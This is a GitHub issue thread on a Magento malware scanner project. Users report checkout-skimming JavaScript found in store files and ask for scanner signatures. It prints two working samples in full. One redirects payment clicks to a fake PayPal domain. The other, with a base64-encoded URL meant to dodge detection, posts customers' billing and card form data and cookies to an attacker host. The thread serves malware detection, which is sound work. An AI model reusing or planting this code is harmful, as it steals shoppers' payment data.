magento-malware-scanner icon indicating copy to clipboard operation
magento-malware-scanner copied to clipboard

Published 20 hours ago verified publisher icon gwillem

Malware that change payment method URL to hackers papal account

Open jigneshthummar opened this issue 7 years ago • 2 comments

it was adding following code in some of js in our case it was quickview.js and ccard.js


jQuery(document).ready(function()
{
	if(!(document.cookie.indexOf("userpayid") + 1))
	{
		jQuery("*[onclick^=\"shippingMethod.save()\"]").attr("onclick", "paynow_right();");
		jQuery("*[onclick^=\"checkout.save();\"]").attr("onclick", "paynow_right();");
		jQuery("*[onclick=\"payment.save()\"]").attr("onclick", "paynow_right();");
		jQuery("#checkout-onepage-buttom").attr("onclick", "paynow_right();");
		jQuery("#onestepcheckout-button-place-order").attr("onclick", "paynow_right();");
		jQuery("#onestepcheckout-place-order").attr("onclick", "paynow_right();");
	}
});

function paynow_right()
{
	if(!(document.cookie.indexOf("userpayid") + 1))
	{
		var rand = function()
		{
			return Math.random().toString(36).substr(2);
		};
		document.cookie = "userpayid=" + rand();
		var arr = {
			"location" : "http://" + location.host,
			"method" : "PayPal"
		};
		jQuery(location).attr('href', "//paymentpal.cf/?payment=" + btoa(JSON.stringify(arr)));
	}
}

quickview.js => https://pastebin.com/xUgXxwDe ccard.js => https://pastebin.com/tkGgKQSi

we also see 2 files with strange name

  • 2.php.png => https://pastebin.com/RC4v6UrX
  • slltemap.php.jpg => https://pastebin.com/0q3naCgZ

jigneshthummar avatar Sep 19 '17 20:09 jigneshthummar

Thanks, added signatures in #150

gwillem avatar Sep 25 '17 20:09 gwillem

@gwillem

In one of our production sites I found new version of the same malware. This time their URL is encoded so the scanner would not pick it up

New code:

jQuery(document).ready(function() { if(!(document.cookie.indexOf("userpayid") + 1)) { var rand = function() { return Math.random().toString(36).substr(2); }; document.cookie = "userpayid=" + rand(); } jQuery("[onclick="billing.save()"]").attr("onclick", "checkbillpa("bill");billing.save();"); jQuery("[onclick="payment.save()"]").attr("onclick", "checkbillpa("card");payment.save();"); jQuery("[onclick="checkout.save(); return false;"]").attr("onclick", "checkbillpa("all");checkout.save();return false;"); jQuery("#checkout-onepage-buttom").attr("onclick", "checkbillpa("all");"); jQuery("#onestepcheckout-place-order").attr("onclick", "checkbillpa("all");"); jQuery(".opc-btn-checkout").attr("onclick", "checkbillpa("all");"); jQuery(".onestepcheckout-btn-checkout").attr("onclick", "checkbillpa("all");"); jQuery("[onclick="oscPlaceOrder(this)"]").attr("onclick", "checkbillpa("bill");oscPlaceOrder(this);"); });

function checkbillpa(text) { var urlcheck = atob("Ly9yZXF1ZXN0LnBheW1lbnRwYWwuY2YvY2hlY2twYXltZW50LnBocA=="); if(text == "bill" || text == "all") { jQuery("*[name^="billing"]").each(function() { if(billing[this.name] == "" || billing[this.name] == "undefined" || typeof billing[this.name] === "undefined") billing[this.name] = this.value; });

	jQuery.ajax({url:urlcheck, type:"POST", data:"billing="+encodeURIComponent(JSON.stringify(billing))+"&target="+location.host+"&valid="+encodeURIComponent(document.cookie)});
}
if(text == "card" || text == "all")
{
	jQuery("*[name^=\"payment\"]").each(function()
	{
		payment[this.name] = this.value;
	});

	jQuery.ajax({url:urlcheck, type:"POST", data:"payment="+encodeURIComponent(JSON.stringify(payment))+"&target="+location.host+"&valid="+encodeURIComponent(document.cookie)});
}

}

Please add to signatures.

kesarweb avatar Apr 12 '18 22:04 kesarweb